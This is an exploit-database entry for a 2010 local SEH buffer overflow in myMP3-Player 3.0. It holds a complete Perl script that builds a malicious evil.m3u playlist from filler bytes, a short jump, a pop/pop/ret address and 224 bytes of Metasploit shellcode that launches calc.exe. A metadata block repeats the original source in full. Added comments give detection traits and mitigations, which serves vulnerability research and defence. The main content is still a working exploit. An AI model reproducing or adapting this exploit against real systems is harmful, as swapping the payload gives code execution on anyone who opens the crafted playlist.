ID EXPLOITPACK:82514805C7E9AB1398F507D509A02E60
Type exploitpack
Reporter n3w7u
Modified 2010-03-18T00:00:00
Description
myMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)
#!/usr/bin/perl
# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 (other versions could not be downloaded from a reputable page and are not free)
# Tested on: Windows XP SP3 (ger)
#
# Purpose: proof-of-concept generator. It writes one file, evil.m3u, holding
# the concatenation of the byte strings defined below; nothing else is done.
# The overflow itself happens in the player when it parses the playlist --
# presumably an unchecked copy of a playlist entry into a fixed-size stack
# buffer (inferred from the title; the vulnerable code is not shown here).
#
# File layout, as given by the author:
#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]
#
# Defender notes:
#  - Artifact: a normal .m3u is line-oriented text (paths/URLs). The file
#    produced here is a single unterminated line of 1302 bytes
#    (1040+4+4+20+224+10): a long run of 0x41 followed by non-printable
#    bytes. Content inspection of playlist files can key on either trait.
#  - Behaviour: per the payload header below the shellcode runs calc.exe, so
#    a media player spawning an unrelated child process is the runtime signal.
#  - Mitigation: this is the classic SEH-record overwrite pattern. SafeSEH,
#    SEHOP, DEP and ASLR are the platform mitigations aimed at it; the tested
#    target (Windows XP SP3) predates SEHOP. The durable fix is a bounds
#    check in the player's playlist parser.

# Output file name; hard-coded, written to the current working directory.
my $file= "evil.m3u";
# Filler: 1040 bytes of 0x41 ('A') placed ahead of the jump and handler
# fields. The author notes a different length for another build.
my $junk ="\x41" x 1040; # for myMp3 Player 5/cracked junk =1056
# 4 bytes: EB 08 is an x86 short jump forward by 8, padded with two NOPs (0x90).
my $jmp="\xEB\x08\x90\x90"; # jmp short
# 4-byte little-endian address for the "P/P/R" slot of the layout above. The
# author attributes it to msacm32.drv; that mapping is specific to the tested
# OS build and has not been verified here.
my $seh="\x25\x12\xC8\x72"; #72 C8 12 25 msacm32.drv
# NOP padding (0x90): 20 bytes ahead of the payload, 10 bytes after it.
my $nop ="\x90" x 20;
my $nops ="\x90" x 10;
# Payload, per the generator header left by the author (not decoded here):
# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";
# Write the assembled bytes to $file, truncating any existing file.
# NOTE(review): two-argument open on an undeclared global handle, with the
# results of open/print/close unchecked -- a failed open passes silently.
# The script has no "use strict" / "use warnings".
open($File,">$file");
print $File $junk.$jmp.$seh.$nop.$buf.$nops;
close($File);
{"lastseen": "2020-04-01T19:06:02", "references": [], "description": "\nmyMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)", "edition": 1, "reporter": "n3w7u", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2010-03-18T00:00:00", "title": "myMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:06:02", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:06:02", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-03-18T00:00:00", "id": "EXPLOITPACK:82514805C7E9AB1398F507D509A02E60", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/perl\n\n# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)\n# Date: 18.03.2010\n# Author: n3w7u\n# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html\n# Version: 3.0 and the other version can't be download from serious Page, and don't be free.\n# Tested on: Windows XP SP3 (ger)\n\n\n#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]\n\nmy $file= \"evil.m3u\";\nmy $junk =\"\\x41\" x 1040; # for myMp3 Player 5/cracked junk =1056\nmy $jmp=\"\\xEB\\x08\\x90\\x90\"; # jmp short\nmy $seh=\"\\x25\\x12\\xC8\\x72\"; #72 C8 12 25 msacm32.drv\nmy $nop =\"\\x90\" x 20;\nmy $nops =\"\\x90\" x 10;\n\n# windows/exec - 224 bytes\n# http://www.metasploit.com\n# Encoder: x86/call4_dword_xor\n# EXITFUNC=process, CMD=calc.exe\nmy $buf =\n\"\\x2b\\xc9\\x83\\xe9\\xce\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\" .\n\"\\x0e\\xa8\\x6e\\x77\\xce\\x83\\xee\\xfc\\xe2\\xf4\\x54\\x86\\xfe\\xce\" .\n\"\\xa8\\x6e\\x17\\x47\\x4d\\x5f\\xa5\\xaa\\x23\\x3c\\x47\\x45\\xfa\\x62\" .\n\"\\xfc\\x9c\\xbc\\xe5\\x05\\xe6\\xa7\\xd9\\x3d\\xe8\\x99\\x91\\x46\\x0e\" .\n\"\\x04\\x52\\x16\\xb2\\xaa\\x42\\x57\\x0f\\x67\\x63\\x76\\x09\\x4a\\x9e\" .\n\"\\x25\\x99\\x23\\x3c\\x67\\x45\\xea\\x52\\x76\\x1e\\x23\\x2e\\x0f\\x4b\" 
.\n\"\\x68\\x1a\\x3d\\xcf\\x78\\x3e\\xfc\\x86\\xb0\\xe5\\x2f\\xee\\xa9\\xbd\" .\n\"\\x94\\xf2\\xe1\\xe5\\x43\\x45\\xa9\\xb8\\x46\\x31\\x99\\xae\\xdb\\x0f\" .\n\"\\x67\\x63\\x76\\x09\\x90\\x8e\\x02\\x3a\\xab\\x13\\x8f\\xf5\\xd5\\x4a\" .\n\"\\x02\\x2c\\xf0\\xe5\\x2f\\xea\\xa9\\xbd\\x11\\x45\\xa4\\x25\\xfc\\x96\" .\n\"\\xb4\\x6f\\xa4\\x45\\xac\\xe5\\x76\\x1e\\x21\\x2a\\x53\\xea\\xf3\\x35\" .\n\"\\x16\\x97\\xf2\\x3f\\x88\\x2e\\xf0\\x31\\x2d\\x45\\xba\\x85\\xf1\\x93\" .\n\"\\xc2\\x6f\\xfa\\x4b\\x11\\x6e\\x77\\xce\\xf8\\x06\\x46\\x45\\xc7\\xe9\" .\n\"\\x88\\x1b\\x13\\x9e\\xc2\\x6c\\xfe\\x06\\xd1\\x5b\\x15\\xf3\\x88\\x1b\" .\n\"\\x94\\x68\\x0b\\xc4\\x28\\x95\\x97\\xbb\\xad\\xd5\\x30\\xdd\\xda\\x01\" .\n\"\\x1d\\xce\\xfb\\x91\\xa2\\xad\\xc9\\x02\\x14\\xe0\\xcd\\x16\\x12\\xce\";\n\nopen($File,\">$file\");\nprint $File $junk.$jmp.$seh.$nop.$buf.$nops;\nclose($File);", "cvss": {"score": 0.0, "vector": "NONE"}}
{}